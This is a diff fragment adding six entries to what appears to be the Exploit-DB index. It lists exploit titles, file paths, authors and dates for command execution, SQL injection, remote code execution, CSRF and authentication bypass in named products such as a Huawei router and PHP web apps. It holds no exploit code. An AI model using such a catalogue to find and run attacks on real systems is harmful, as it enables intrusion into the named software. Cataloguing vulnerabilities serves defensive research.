+45990,exploits/multiple/webapps/45990.txt,"Fortify Software Security Center (SSC) 17.10/17.20/18.10 - Information Disclosure (2)",2018-12-14,alt3kx,webapps,multiple,
+45991,exploits/hardware/webapps/45991.py,"Huawei Router HG532e - Command Execution",2018-12-14,Rebellion,webapps,hardware,
+45992,exploits/php/webapps/45992.html,"Facebook And Google Reviews System For Businesses - Cross-Site Request Forgery (Change Admin Password)",2018-12-14,Veyselxan,webapps,php,
+45994,exploits/php/webapps/45994.txt,"Facebook And Google Reviews System For Businesses 1.1 - SQL Injection",2018-12-14,"Ihsan Sencan",webapps,php,
+45995,exploits/php/webapps/45995.txt,"Facebook And Google Reviews System For Businesses 1.1 - Remote Code Execution",2018-12-14,"Ihsan Sencan",webapps,php,
+45997,exploits/php/webapps/45997.txt,"Double Your Bitcoin Script Automatic - Authentication Bypass",2018-12-14,Veyselxan,webapps,php,